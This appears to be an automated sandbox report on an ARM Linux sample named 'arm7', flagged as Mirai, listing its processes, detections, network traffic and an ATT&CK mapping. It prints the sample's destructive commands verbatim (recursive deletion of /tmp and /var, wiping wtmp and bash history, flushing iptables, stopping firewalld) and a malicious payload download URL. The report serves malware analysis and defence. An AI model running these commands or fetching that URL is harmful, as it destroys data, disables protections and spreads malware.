              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 759, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 772, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 789, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 800, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 904, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 936, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1320, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1334, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1335, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1389, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1809, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1872, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1888, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 1983, result: successful
              Source: /tmp/arm7 (PID: 5249)SIGKILL sent: pid: 2048, result: successful
              Source: /usr/bin/pkill (PID: 5294)SIGKILL sent: pid: 2258, result: successful
              Source: /usr/bin/pkill (PID: 5294)SIGKILL sent: pid: 4486, result: no such process
              Source: LOAD without section mappings Program segment: 0x8000
              Source: arm7, type: SAMPLE Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
              Source: arm7 Joe Sandbox Cloud Basic: Detection: clean Score: 0
              Source: classification engine Classification label: mal100.spre.troj.evad.lin@0/9@2/0

              Data Obfuscation:

              Sample is packed with UPX
              Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
              Source: initial sample String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

              Persistence and Installation Behavior:

              Deletes all firewall rules
              Source: /bin/sh (PID: 5277)Args: iptables -F
              Sample reads /proc/mounts (often used for finding a writable filesystem)
              Source: /bin/fusermount (PID: 5456)File: /proc/5456/mounts
              Source: /bin/sh (PID: 5284)Pkill executable: /usr/bin/pkill -> pkill -9 busybox
              Source: /bin/sh (PID: 5289)Pkill executable: /usr/bin/pkill -> pkill -9 perl
              Source: /bin/sh (PID: 5294)Pkill executable: /usr/bin/pkill -> pkill -9 python
              Source: /usr/share/gdm/generate-config (PID: 5446)Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
              Source: /usr/share/gdm/generate-config (PID: 5568)Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
              Source: /bin/sh (PID: 5430)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5432)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              Source: /bin/sh (PID: 5434)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5436)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              Source: /bin/sh (PID: 5438)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5440)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              Source: /bin/sh (PID: 5442)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5444)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              Source: /bin/sh (PID: 5552)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5554)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              Source: /bin/sh (PID: 5556)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5558)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              Source: /bin/sh (PID: 5560)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5562)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              Source: /bin/sh (PID: 5564)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              Source: /bin/sh (PID: 5566)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              Source: /usr/bin/whoopsie (PID: 5355)Directory: /nonexistent/.cache
              Source: /bin/sh (PID: 5310)Iptables executable: /sbin/iptables -> /sbin/iptables -F
              Source: /bin/sh (PID: 5311)Iptables executable: /sbin/iptables -> /sbin/iptables -X
              Source: /usr/bin/whoopsie (PID: 5355)File: /var/crash (bits: gv usr: rwx grp: rwx all: rwx)
              Source: /usr/sbin/gdm3 (PID: 5500)File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)
              Source: /usr/sbin/gdm3 (PID: 5500)File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)
              Source: /usr/sbin/gdm3 (PID: 5579)File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)
              Source: /usr/sbin/gdm3 (PID: 5579)File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)
              Source: /tmp/arm7 (PID: 5255)Shell command executed: /bin/sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*"
              Source: /tmp/arm7 (PID: 5262)Shell command executed: /bin/sh -c "rm -rf /var/log/wtmp"
              Source: /tmp/arm7 (PID: 5269)Shell command executed: /bin/sh -c "rm -rf /tmp/*"
              Source: /tmp/arm7 (PID: 5272)Shell command executed: /bin/sh -c "rm -rf /bin/netstat"
              Source: /tmp/arm7 (PID: 5275)Shell command executed: /bin/sh -c "iptables -F"
              Source: /tmp/arm7 (PID: 5281)Shell command executed: /bin/sh -c "pkill -9 busybox"
              Source: /tmp/arm7 (PID: 5287)Shell command executed: /bin/sh -c "pkill -9 perl"
              Source: /tmp/arm7 (PID: 5292)Shell command executed: /bin/sh -c "pkill -9 python"
              Source: /tmp/arm7 (PID: 5295)Shell command executed: /bin/sh -c "service iptables stop"
              Source: /tmp/arm7 (PID: 5308)Shell command executed: /bin/sh -c "/sbin/iptables -F; /sbin/iptables -X"
              Source: /tmp/arm7 (PID: 5312)Shell command executed: /bin/sh -c "service firewalld stop"
              Source: /tmp/arm7 (PID: 5323)Shell command executed: /bin/sh -c "rm -rf ~/.bash_history"
              Source: /tmp/arm7 (PID: 5326)Shell command executed: /bin/sh -c "history -c"
              Source: /usr/bin/gpu-manager (PID: 5429)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5431)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5433)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5435)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5437)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5439)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5441)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5443)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5551)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5553)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5555)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5557)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5559)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5561)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5563)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
              Source: /usr/bin/gpu-manager (PID: 5565)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
              Source: /bin/sh (PID: 5257)Rm executable: /usr/bin/rm -> rm -rf /tmp/arm7 /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te 
/var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf
              Source: /bin/sh (PID: 5268)Rm executable: /usr/bin/rm -> rm -rf /var/log/wtmp
              Source: /bin/sh (PID: 5271)Rm executable: /usr/bin/rm -> rm -rf /tmp/*
              Source: /bin/sh (PID: 5274)Rm executable: /usr/bin/rm -> rm -rf /bin/netstat
              Source: /bin/sh (PID: 5325)Rm executable: /usr/bin/rm -> rm -rf /root/.bash_history
              Source: /usr/bin/gpu-manager (PID: 5550)Log file created: /var/log/gpu-manager.log
              Source: /usr/sbin/service (PID: 5304)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
              Source: /usr/sbin/service (PID: 5320)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

              Hooking and other Techniques for Hiding and Protection:

              Sample deletes itself
              Source: /usr/bin/rm (PID: 5257)File: /tmp/arm7
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 41586 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41234 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 38462 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45674 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48790 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48656 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 34132 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41586 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 36468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58178 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41234 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 58762 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 38462 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48790 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 34132 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 52869

              Malware Analysis System Evasion:

              Deletes security-related log files
              Source: /usr/bin/rm (PID: 5268) Truncated file: /var/log/wtmp
              Source: /usr/bin/pkill (PID: 5284) Reads CPU info from /sys: /sys/devices/system/cpu/online
              Source: /usr/bin/pkill (PID: 5289) Reads CPU info from /sys: /sys/devices/system/cpu/online
              Source: /usr/bin/pkill (PID: 5294) Reads CPU info from /sys: /sys/devices/system/cpu/online
              Source: /usr/bin/pulseaudio (PID: 5403) Reads CPU info from /sys: /sys/devices/system/cpu/online
              Source: /usr/bin/pkill (PID: 5446) Reads CPU info from /sys: /sys/devices/system/cpu/online
              Source: /usr/bin/pkill (PID: 5568) Reads CPU info from /sys: /sys/devices/system/cpu/online
              Source: /tmp/arm7 (PID: 5234) Queries kernel information via 'uname':
              Source: /usr/bin/whoopsie (PID: 5355) Queries kernel information via 'uname':
              Source: /usr/bin/pulseaudio (PID: 5403) Queries kernel information via 'uname':
              Source: /usr/bin/gpu-manager (PID: 5428) Queries kernel information via 'uname':
              Source: /usr/bin/gpu-manager (PID: 5550) Queries kernel information via 'uname':
              Source: /usr/bin/gpu-manager (PID: 5428) Truncated file: /var/log/gpu-manager.log
              Source: /usr/bin/gpu-manager (PID: 5550) Truncated file: /var/log/gpu-manager.log
              Source: arm7, 5249.1.0000000033ce1296.00000000702d846d.rw-.sdmp Binary or memory string: !/proc/1594/exe0!/usr/bin/vmtoolsd1P
              Source: arm7, 5249.1.0000000033ce1296.00000000702d846d.rw-.sdmp Binary or memory string: /usr/bin/vmtoolsd
              Source: arm7, 5234.1.0000000033ce1296.00000000702d846d.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
              Source: arm7, 5234.1.000000002e60d099.00000000e478edd3.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
              Source: arm7, 5234.1.0000000033ce1296.00000000702d846d.rw-.sdmp Binary or memory string: +V!/etc/qemu-binfmt/arm
              Source: arm7, 5234.1.000000002e60d099.00000000e478edd3.rw-.sdmp Binary or memory string: G{x86_64/usr/bin/qemu-arm/tmp/arm7SUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm7

              Stealing of Sensitive Information:

              Yara detected Mirai
              Source: Yara match File source: 5241.1.00000000f6abff04.000000008642ee32.r-x.sdmp, type: MEMORY
              Source: Yara match File source: 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmp, type: MEMORY
              Source: Yara match File source: 5249.1.00000000f6abff04.000000008642ee32.r-x.sdmp, type: MEMORY
              Source: Yara match File source: 5236.1.00000000f6abff04.000000008642ee32.r-x.sdmp, type: MEMORY
              Source: Yara match File source: 5237.1.00000000f6abff04.000000008642ee32.r-x.sdmp, type: MEMORY
              Source: Yara match File source: 5245.1.00000000f6abff04.000000008642ee32.r-x.sdmp, type: MEMORY
              Source: Yara match File source: 5251.1.00000000f6abff04.000000008642ee32.r-x.sdmp, type: MEMORY
              Source: Yara match File source: 5253.1.00000000f6abff04.000000008642ee32.r-x.sdmp, type: MEMORY
              Source: Yara match File source: 5239.1.00000000f6abff04.000000008642ee32.r-x.sdmp, type: MEMORY
              Source: Yara match File source: 5240.1.00000000f6abff04.000000008642ee32.r-x.sdmp, type: MEMORY
              Source: Yara match File source: dump.pcap, type: PCAP

              Remote Access Functionality:

              Yara detected Mirai

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
              Valid Accounts | Command and Scripting Interpreter 1 | Path Interception | Path Interception | File and Directory Permissions Modification 1 | OS Credential Dumping 1 | Security Software Discovery 11 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Scripting 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | System Network Configuration Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port 11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting 1 | Security Account Manager | File and Directory Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Hidden Files and Directories 1 | NTDS | System Information Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Disable or Modify System Firewall 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Indicator Removal on Host 11 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 11 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

              Malware Configuration

              No configs have been found

              Behavior Graph

              [Figure: behavior graph. Behavior Graph ID: 519695, Sample: arm7, Startdate: 11/11/2021, Architecture: LINUX, Score: 100. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Number of created Files, Is malicious, Internet.]

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label | Link
              --- | --- | --- | --- | ---
              arm7 | 23% | ReversingLabs | Linux.Trojan.Mirai |

              Dropped Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              Source | Detection | Scanner | Label | Link
              --- | --- | --- | --- | ---
              http://23.94.186.250/..23091t/mips; | 100% | Avira URL Cloud | malware |

              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              --- | --- | --- | --- | --- | ---
              daisy.ubuntu.com | 162.213.33.108 | true | false | | high

              URLs from Memory and Binaries

              Name | Source | Malicious | Antivirus Detection | Reputation
              --- | --- | --- | --- | ---
              http://23.94.186.250/..23091t/mips; | arm7, 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmp | true | Avira URL Cloud: malware | unknown
              http://schemas.xmlsoap.org/soap/encoding//%22%3E | arm7, 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmp | false | | high
              http://upx.sf.net | arm7 | false | | high
              http://schemas.xmlsoap.org/soap/encoding/ | arm7, 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmp | false | | high
              http://schemas.xmlsoap.org/soap/envelope// | arm7, 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmp | false | | high
